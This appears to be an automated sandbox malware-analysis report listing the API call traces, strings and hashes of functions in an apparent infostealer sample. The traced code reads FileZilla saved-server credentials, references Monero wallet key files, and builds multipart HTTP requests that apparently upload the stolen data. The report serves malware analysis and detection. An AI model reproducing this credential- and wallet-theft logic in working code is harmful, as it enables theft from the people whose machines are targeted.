Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020,00000000), ref: 006976D3
Part of subcall function 006975D0: lstrcat.KERNEL32(2F74D020,006B1808), ref: 006976ED
Part of subcall function 006975D0: task.LIBCPMTD ref: 006976FB

lstrcat.KERNEL32(?,0135E838), ref: 00697E0B
lstrcat.KERNEL32(?,0135DB20), ref: 00697E1E
lstrlen.KERNEL32(2F74D020), ref: 00697E2B
lstrlen.KERNEL32(2F74D020), ref: 00697E3B

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 984393ab1d4643a0ef9f138b31c86487610d193a65c608a012c56e1285cb78a9
Instruction ID: c62c5e4ebbed4543c5c7452180571f4838f25b6444e6c7c9a9f0981ebc6c83c9
Opcode Fuzzy Hash: 984393ab1d4643a0ef9f138b31c86487610d193a65c608a012c56e1285cb78a9
Instruction Fuzzy Hash: E9323FB6C10354ABCB55FBA0DC85DEA737DBB48700F044A99F219A2090EE74EB89CF55

Function 006A0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A

Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52

GetProcessHeap.KERNEL32(00000000,000F423F,006B0DBA,006B0DB7,006B0DB6,006B0DB3), ref: 006A0362
RtlAllocateHeap.NTDLL(00000000), ref: 006A0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 006A0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 006A03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 006A0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006A0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 006A0562
lstrcat.KERNEL32(?,profile: null), ref: 006A0571
lstrcat.KERNEL32(?,url: ), ref: 006A0580
lstrcat.KERNEL32(?,00000000), ref: 006A0593
lstrcat.KERNEL32(?,006B1678), ref: 006A05A2
lstrcat.KERNEL32(?,00000000), ref: 006A05B5
lstrcat.KERNEL32(?,006B167C), ref: 006A05C4
lstrcat.KERNEL32(?,login: ), ref: 006A05D3
lstrcat.KERNEL32(?,00000000), ref: 006A05E6
lstrcat.KERNEL32(?,006B1688), ref: 006A05F5
lstrcat.KERNEL32(?,password: ), ref: 006A0604
lstrcat.KERNEL32(?,00000000), ref: 006A0617
lstrcat.KERNEL32(?,006B1698), ref: 006A0626
lstrcat.KERNEL32(?,006B169C), ref: 006A0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006B0DB2), ref: 006A068E

Strings

url: , xrefs: 006A0577
<Pass encoding="base64">, xrefs: 006A045A
<Host>, xrefs: 006A037C
profile: null, xrefs: 006A0568
<User>, xrefs: 006A0410
password: , xrefs: 006A05FB
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 006A02A4
login: , xrefs: 006A05CA
<Port>, xrefs: 006A03C6
browser: FileZilla, xrefs: 006A0559

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 62dec601bb6bbf489d4ec58d3679696a293c3e4603464888b01947a325a88f6d
Instruction ID: 9e74d17dfdfc44c5129e50eeee9350c332fb496b7054242737b143e6e31c01d2
Opcode Fuzzy Hash: 62dec601bb6bbf489d4ec58d3679696a293c3e4603464888b01947a325a88f6d
Instruction Fuzzy Hash: 5CD11BB1900108ABDB84FBE4DD96EEE777ABF19300F50451AF502A6091EF34AE46CF65

Function 00695100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

lstrlen.KERNEL32(00000000), ref: 00695193

Part of subcall function 006A8EA0: CryptBinaryToStringA.CRYPT32(00000000,00695184,40000001,00000000,00000000,?,00695184), ref: 006A8EC0

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00695207
StrCmpCA.SHLWAPI(?,0135E928), ref: 00695225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00695340
HttpOpenRequestA.WININET(00000000,0135E8F8,?,0135E1D0,00000000,00000000,00400100,00000000), ref: 006953A4

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0135E7A8,00000000,?,0135A4E0,00000000,?,006B19DC,00000000,?,006A51CF), ref: 00695737
lstrlen.KERNEL32(00000000), ref: 0069574B
GetProcessHeap.KERNEL32(00000000,?), ref: 0069575C
RtlAllocateHeap.NTDLL(00000000), ref: 00695763
lstrlen.KERNEL32(00000000), ref: 00695778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006957A9
lstrlen.KERNEL32(00000000), ref: 006957C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006957E1
lstrlen.KERNEL32(00000000,?,?), ref: 0069580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00695822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0069584D
InternetCloseHandle.WININET(00000000), ref: 006958B1
InternetCloseHandle.WININET(00000000), ref: 006958BE
InternetCloseHandle.WININET(00000000), ref: 006958C8

Strings

--, xrefs: 00695280
------, xrefs: 00695297
------, xrefs: 006953B7
------, xrefs: 006954F9
------, xrefs: 0069563B
", xrefs: 00695482
", xrefs: 006955C4
", xrefs: 00695706

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1224485577-2774362122
Opcode ID: a46988a17852d3b24340e4cb8e304dbcad4bd8bd86d5557be198a0e67432852e
Instruction ID: d8f954a358c7546f3669372635c0e2c1962836cefdbd7ac085a725b3d70e285b
Opcode Fuzzy Hash: a46988a17852d3b24340e4cb8e304dbcad4bd8bd86d5557be198a0e67432852e
Instruction Fuzzy Hash: 8A322F71921118AADB94FBE0DC91FEEB37ABF15700F50419EB10662092EF346E49CF5A

Function 0069A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AAA70: StrCmpCA.SHLWAPI(013591D8,0069A7A7,?,0069A7A7,013591D8), ref: 006AAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0069AAC8
RtlAllocateHeap.NTDLL(00000000), ref: 0069AACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 0069ABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069A8B0

Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

lstrcat.KERNEL32(?,00000000), ref: 0069ACEB
lstrcat.KERNEL32(?,006B1320), ref: 0069ACFA
lstrcat.KERNEL32(?,00000000), ref: 0069AD0D
lstrcat.KERNEL32(?,006B1324), ref: 0069AD1C
lstrcat.KERNEL32(?,00000000), ref: 0069AD2F
lstrcat.KERNEL32(?,006B1328), ref: 0069AD3E
lstrcat.KERNEL32(?,00000000), ref: 0069AD51
lstrcat.KERNEL32(?,006B132C), ref: 0069AD60
lstrcat.KERNEL32(?,00000000), ref: 0069AD73
lstrcat.KERNEL32(?,006B1330), ref: 0069AD82
lstrcat.KERNEL32(?,00000000), ref: 0069AD95
lstrcat.KERNEL32(?,006B1334), ref: 0069ADA4
lstrcat.KERNEL32(?,00000000), ref: 0069ADB7
lstrlen.KERNEL32(?), ref: 0069AE0D
lstrlen.KERNEL32(?), ref: 0069AE1C

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

DeleteFileA.KERNEL32(00000000), ref: 0069AE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 0069ABD4

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: a2db11529b7d7d1bf38e90d55dbeb74e14a56581a9f347da5e6205b9e58eebc2
Instruction ID: 736e9c31192e95ce9415e97fc6de880ffc1daeef5cdda5bb1e3a9865b4dde9e8
Opcode Fuzzy Hash: a2db11529b7d7d1bf38e90d55dbeb74e14a56581a9f347da5e6205b9e58eebc2
Instruction Fuzzy Hash: 7C120D719111089BCB88FBE0DD96EEE737ABF15300F50415AB507A6091EF34AE49CFA6

Function 00695960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 006947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00694839
Part of subcall function 006947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00694849

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006959F8
StrCmpCA.SHLWAPI(?,0135E928), ref: 00695A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00695B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0135E8D8,00000000,?,0135A4E0,00000000,?,006B1A1C), ref: 00695E71
lstrlen.KERNEL32(00000000), ref: 00695E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00695E93
RtlAllocateHeap.NTDLL(00000000), ref: 00695E9A
lstrlen.KERNEL32(00000000), ref: 00695EAF
lstrlen.KERNEL32(00000000), ref: 00695ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00695EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00695F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00695F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00695F4C
InternetCloseHandle.WININET(00000000), ref: 00695FB0
InternetCloseHandle.WININET(00000000), ref: 00695FBD
HttpOpenRequestA.WININET(00000000,0135E8F8,?,0135E1D0,00000000,00000000,00400100,00000000), ref: 00695BF8

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

InternetCloseHandle.WININET(00000000), ref: 00695FC7

Strings

------, xrefs: 00695D4C
", xrefs: 00695E16
", xrefs: 00695CD5
------, xrefs: 00695A96
------, xrefs: 00695C0B

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
